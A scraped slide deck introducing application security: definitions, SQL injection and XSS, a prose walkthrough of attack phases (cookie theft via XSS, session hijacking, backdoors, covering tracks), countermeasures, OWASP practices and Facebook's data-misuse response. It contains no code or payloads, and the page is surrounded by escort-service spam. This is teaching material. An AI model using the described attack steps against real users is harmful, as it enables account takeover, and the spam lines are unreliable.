Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...
 
HARDNESS, FRACTURE TOUGHNESS AND STRENGTH OF CERAMICS
HARDNESS, FRACTURE TOUGHNESS AND STRENGTH OF CERAMICSHARDNESS, FRACTURE TOUGHNESS AND STRENGTH OF CERAMICS
HARDNESS, FRACTURE TOUGHNESS AND STRENGTH OF CERAMICS
 
Microscopic Analysis of Ceramic Materials.pptx
Microscopic Analysis of Ceramic Materials.pptxMicroscopic Analysis of Ceramic Materials.pptx
Microscopic Analysis of Ceramic Materials.pptx
 
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
 
VIP Call Girls Service Kondapur Hyderabad Call +91-8250192130
VIP Call Girls Service Kondapur Hyderabad Call +91-8250192130VIP Call Girls Service Kondapur Hyderabad Call +91-8250192130
VIP Call Girls Service Kondapur Hyderabad Call +91-8250192130
 
Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...
Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...
Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...
 
MANUFACTURING PROCESS-II UNIT-2 LATHE MACHINE
MANUFACTURING PROCESS-II UNIT-2 LATHE MACHINEMANUFACTURING PROCESS-II UNIT-2 LATHE MACHINE
MANUFACTURING PROCESS-II UNIT-2 LATHE MACHINE
 
Sheet Pile Wall Design and Construction: A Practical Guide for Civil Engineer...
Sheet Pile Wall Design and Construction: A Practical Guide for Civil Engineer...Sheet Pile Wall Design and Construction: A Practical Guide for Civil Engineer...
Sheet Pile Wall Design and Construction: A Practical Guide for Civil Engineer...
 
SPICE PARK APR2024 ( 6,793 SPICE Models )
SPICE PARK APR2024 ( 6,793 SPICE Models )SPICE PARK APR2024 ( 6,793 SPICE Models )
SPICE PARK APR2024 ( 6,793 SPICE Models )
 
Introduction to Multiple Access Protocol.pptx
Introduction to Multiple Access Protocol.pptxIntroduction to Multiple Access Protocol.pptx
Introduction to Multiple Access Protocol.pptx
 
(RIA) Call Girls Bhosari ( 7001035870 ) HI-Fi Pune Escorts Service
(RIA) Call Girls Bhosari ( 7001035870 ) HI-Fi Pune Escorts Service(RIA) Call Girls Bhosari ( 7001035870 ) HI-Fi Pune Escorts Service
(RIA) Call Girls Bhosari ( 7001035870 ) HI-Fi Pune Escorts Service
 

Application security

  • 1.
  • 2. We will cover: • Some basic definitions • Application Security meaning • CIA • Vulnerabilities • Demo attack • Countermeasures • Best practice to build a secure app. • Facebook on Spot
  • 3. Basic definitions Asset: Resources of value need to be protected Threat: undesired event that may compromise an asset or object , or produce undesired outcome Vulnerability: is the weakness in your system , or in security control, that makes an exploit harm Attack: is an action that utilizes one or more vulnerabilities to realize a threat. Security Control: process or policy put togther to minimize security threats to an acceptable level.
  • 4. is the use of software, hardware, and procedural methods to protect applications from external threats. Attacks Shift Towards Application Layer % of Dollars 75% “attacks” Application Security
  • 5. Confidentiality Malware can be written to do directed searches and send confidential data to specific parties Integrity viruses attached and keep themselves resident in the system which allow attacker to completely control a system, this may erase data files, or interfere with application data over time in such a way that data integrity is compromised and data may become completely useless. Availability malware can compromise programs and data to the point where they are no longer available, sometimes this can be a direct denial of service (DoS) attack, and sometimes it is a side effect of the activity of the malware. Application Security aims to secure:
  • 6. Application Vulnerability A software “vulnerability” leads to process critical data in an insecure way. By exploiting these “holes” in applications, cybercriminals can gain entry into an organization’s systems and steal confidential data. Common software vulnerabilities: • SQL injection • Cross-Site Scripting (XSS). And almost every application has vulnerabilities. about 70% of all applications had at least one vulnerability classified as one of the top 10 web vulnerability types. Commercial software, financial services software, software written by government agencies … all are vulnerable.
  • 7. Application Vulnerability - Demo Attack Phases of hacker attacks 1-Information • Fingerprinting • Vulnerability DB • Bulletin Boards • ……. 2-Infrastructure • Phishing • Pharming • XSS • ….. 3-Exploit • ….. 4-Keep Access • Backdoor • Trojan • Rootkits • ….. 5-Delete Fingerprints • Destroy evidences • Steganography • Tunneling
  • 8. Phase 1 (Information) SQL Injection 1. Hacker searches information about victim’s target system Operating System Web Server Database 2. Compares information with vulnerability database 3. Hacker found vulnerability Search for (specific) user Find additional information about user 4. Needs information for next phase of attack Application Vulnerability - Demo Attack
  • 9. Phase 2 (Infrastructure) Cross Site Scripting (XSS) 1. Hacker found personal information about user e-mail Phone number … 2. Sends e-mail with unsuspicious topic 3. Includes XSS in e-Mail that sends user session to the hackers server 4. User receives e-Mail 5. e-mail is unsuspicious to user Topic Originator 6. Included XSS sends all cookies to hacker’s web site Application Vulnerability - Demo Attack
  • 10. Phase 3 - Exploit Session hijacking 1. Hacker received all cookies from user 2. Cookies are used to identify users 3. Hacker uses cookie to resume user session 4. Hacker is logged in as user “victim” with user’s access rights o XSS-Proxy is a tool for leveraging Cross-Site-Scripting (XSS) flaws to hijack victim browsers and allows a bi-directional interactive control channel between attacker, victim browser and an XSS vulnerable site Now hacker has logged in to your banking site with your access right. That was just the beginning Application Vulnerability - Demo Attack
  • 11. • Attacker can implement a sniffer to capture all network traffic • Use a backdoor or trojan to gain repeated access. • May install rootkits in the kernel to get superuser access at the operating system level. • They can then use their access to steal data, consume CPU cycles and exchange confidential information or even resort to extortion. • They can maintain control of their system for a long time by "hardening the system" against other attackers Application Vulnerability - Demo Attack Phase 5 – Delete Fingerprints Phase 4 – Keep Access • Trojans such as ps or netcat are useful to destroy the evidence in the registry files or replace the system binaries with them. • Steganography, is the process of hiding data, for example, in images and sound files. • Tunneling, takes advantage of the transmission protocol by carrying one protocol over another. Even the extra space (unused bits) in the TCP and IP headers can be used to hide information
  • 12. Application Security Countermeasures • Countermeasures are the actions taken to ensure application security • Application Firewall is the most basic software countermeasure that limits the execution of files or the handling of data by specific installed programs. • Router is the most common hardware countermeasure that can prevent the IP address of an individual computer from being directly visible on the Internet. • Other countermeasures include conventional firewalls, encryption/decryption programs, anti-virus programs, spyware detection/removal programs and biometric authentication systems.
  • 13. Best Practices to Build Secure Applications 1. Follow the OWASP Top Ten it contains the most critical web application security vulnerabilities, these security vulnerabilities target the confidentiality, integrity, and availability of an application, its developers, and its users. They cover such attack vectors as injection attacks, authentication and session management, security misconfiguration, and sensitive data exposure. 2. Get an Application Security Audit people with specific, professional application security experience, who know what to look for, including the obvious and the subtle, as well as the hidden things. They’ll also be abreast of current security issues and be knowledgeable about issues which aren’t common knowledge yet. 3. Implement Proper Logging When something goes wrong at some stage and there is a bug that no one saw (or considered severe enough to warrant particular attention) one that will eventually be exploited. to be able to respond as quickly as possible ; you need to have proper logging implemented before the situation gets out of hand. Doing so provides you with information about what occurred, what lead to the situation in the first place, and what else was going on at the time. 4. Use Real-time Security Monitoring and Protection or Web Application Firewalls To protect your application from a range of perspectives, both internal and external using Firewalls in addition to Runtime Application Self-Protection (RASP) and services
  • 14. 5. Encrypt Everything It’s important to also make sure that data at rest is encrypted as well as in transit. HTTPS makes it next to impossible for Man In The Middle (MITM) attacks to occur. 6. Harden Everything you need to ensure that everything is sufficiently hardened from operating systems to software development frameworks 7. Keep Your Servers Up to Date make sure that your servers are set to update to the latest security releases as they become available. 8. Keep Your Software Up to Date Applications frameworks and third party software libraries, just like operating systems, have vulnerabilities. If they’re properly supported, then they will also be rapidly patched and improved. So it’s important to ensure that you’re using the latest stable version. 9. Stay Abreast of the Latest Vulnerabilities there are a range of ways in which we can get updated with the number of attack vectors in play today, vectors such as Cross-site scripting, code injection, SQL injection, insecure direct object references, and cross-site request forgery 10. Never Stop Learning that way, you’ll always have it as a key consideration, and be far less likely to fall victim to security or data breaches. Best Practices to Build Secure Applications
  • 15.
  • 16. Data privacy is a part of information Security & Cyber Security , and any kind of hole in IDOR (Missing Access Control Level) or Data Leakage which exist in GraphQL Wrapper Implementation & Facebook APIs is able to destroy an empire like Facebook IS this related to Information Security!! In USA elections , a quiz app is developed by Kogan for USA residents, and it was aiming to collect users data and their friends, and it did collected data for 50 millions users.
  • 17. What Facebook Information Security Team will do?! • Review our platform. We will investigate all apps that had access to large amounts of information before we changed our platform in 2014 to reduce data access, and we will conduct a full audit of any app with suspicious activity. If we find developers that misused personally identifiable information, we will ban them from our platform. • Tell people about data misuse. We will tell people affected by apps that have misused their data. This includes building a way for people to know if their data might have been accessed via “thisisyourdigitallife.” Moving forward, if we remove an app for misusing data, we will tell everyone who used it. • Turn off access for unused apps. If someone hasn’t used an app within the last three months, we will turn off the app’s access to their information. • Restrict Facebook Login data. We are changing Login, so that in the next version, we will reduce the data that an app can request without app review to include only name, profile photo and email address. Requesting any other data will require our approval. • Encourage people to manage the apps they use. We already show people what apps their accounts are connected to and control what data they’ve permitted those apps to use. Going forward, we’re going to make these choices more prominent and easier to manage. • Reward people who find vulnerabilities. In the coming weeks we will expand Facebook’s bug bounty program so that people can also report to us if they find misuses of data by app developers.